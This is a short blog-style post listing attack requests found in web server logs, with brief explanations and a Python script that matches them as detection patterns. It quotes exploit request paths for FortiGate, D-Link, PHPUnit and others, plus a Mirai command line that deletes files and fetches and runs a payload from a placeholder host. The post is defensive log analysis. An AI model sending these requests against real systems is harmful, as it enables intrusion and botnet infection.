TheMaxus

Common threat actor activity in logs

While looking at my web server logs, I found some interesting requests and decided to look into them. Below are the request examples and short explanations for them.

/actuator/gateway/routes

spring.io Actuator endpoint scanning

/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

FortiGate vulnerability (CVE-2022-42475)

/shell?cd+/tmp;rm+-rf+*;wget+x.x.x.x/jaws;sh+/tmp/jaws

Mirai botnet scanning

/?XDEBUG_SESSION_START=phpstorm

PhpStorm debugging session scanning

/ALFA_DATA/alfacgiapi/perl.alfa

Alfa Shell PHP backdoor scanning

/dnscfg.cgi?dnsPrimary=x.x.x.x&dnsSecondary=x.x.x.x&dnsDynamic=0&dnsRefresh=1

D-Link router DNS-hijacking vulnerability

x.x.x.x:4444

4444 is the default Metasploit Framework shell port

/boaform/admin/formLogin?username=admin&psd=admin

Bots scanning for the Guangzhou 1GE ONU V2801RW router RCE vulnerability

/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
/owa/auth/logon.aspx

Microsoft Exchange server endpoint scanning

POST /HNAP1/

Another D-Link vulnerability (CVE-2022-44808)

POST /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php or similar requests

PHPUnit vulnerability (CVE-2017-9841)
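As an added example (not part of the original post), the following Python turns the request signatures listed above into a small classifier that can be run over Common Log Format lines. The pattern strings are my own approximations of each request, the labels repeat the explanations given above, and the sample log lines and their addresses are constructed.

```python
import re

# Signature table built from the request examples in the post, each paired with the
# post's explanation. Patterns run against the CLF request field ("METHOD /path HTTP/x").
SIGNATURES = [
    (r"/actuator/gateway/routes", "Spring Actuator endpoint scanning"),
    (r"/remote/fgt_lang\?lang=.*\.\./", "FortiGate scanning (CVE-2022-42475)"),
    (r"/shell\?.*wget\+.*jaws", "Mirai botnet scanning"),
    (r"XDEBUG_SESSION_START=", "PhpStorm debugging session scanning"),
    (r"/ALFA_DATA/alfacgiapi/", "Alfa Shell PHP backdoor scanning"),
    (r"/dnscfg\.cgi\?.*dnsPrimary=", "D-Link router DNS-hijacking vulnerability"),
    (r"^\S+ \S+:4444(\s|$)", "Metasploit default shell port (4444)"),
    (r"/boaform/admin/formLogin\?", "Guangzhou 1GE ONU V2801RW router RCE scanning"),
    (r"/ecp/Current/exporttool/|/owa/auth/logon\.aspx", "Microsoft Exchange endpoint scanning"),
    (r"^POST /HNAP1/", "D-Link HNAP vulnerability (CVE-2022-44808)"),
    (r"/phpunit/.*/eval-stdin\.php", "PHPUnit vulnerability (CVE-2017-9841)"),
]
# Apache/nginx Common Log Format: client ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+')

def classify_request(request):
    """Return the post's label for a request field, or None if nothing matched."""
    for pattern, label in SIGNATURES:  # first match wins
        if re.search(pattern, request, re.IGNORECASE):
            return label
    return None

def scan_log(text):
    """Return (client_ip, label, request) for every matching CLF line in the log."""
    hits = []
    for line in text.splitlines():
        m = CLF.match(line)
        if not m:
            continue  # skip lines that are not CLF (or were truncated)
        ip, request, _status = m.groups()
        label = classify_request(request)
        if label:
            hits.append((ip, label, request))
    return hits

# Constructed sample log; client addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Feb/2024:08:12:01 +0000] "GET /actuator/gateway/routes HTTP/1.1" 404 153
198.51.100.9 - - [10/Feb/2024:08:13:44 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+x.x.x.x/jaws;sh+/tmp/jaws HTTP/1.1" 404 153
192.0.2.33 - - [10/Feb/2024:08:15:02 +0000] "POST /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153
192.0.2.40 - - [10/Feb/2024:08:16:10 +0000] "GET /index.html HTTP/1.1" 200 1024
"""
if __name__ == "__main__":
    for ip, label, request in scan_log(SAMPLE_LOG):
        print(f"{ip:15} {label:45} {request}")
```

Feed it a real access log with `scan_log(open("access.log").read())`; lines that are not in Common Log Format are skipped rather than misclassified.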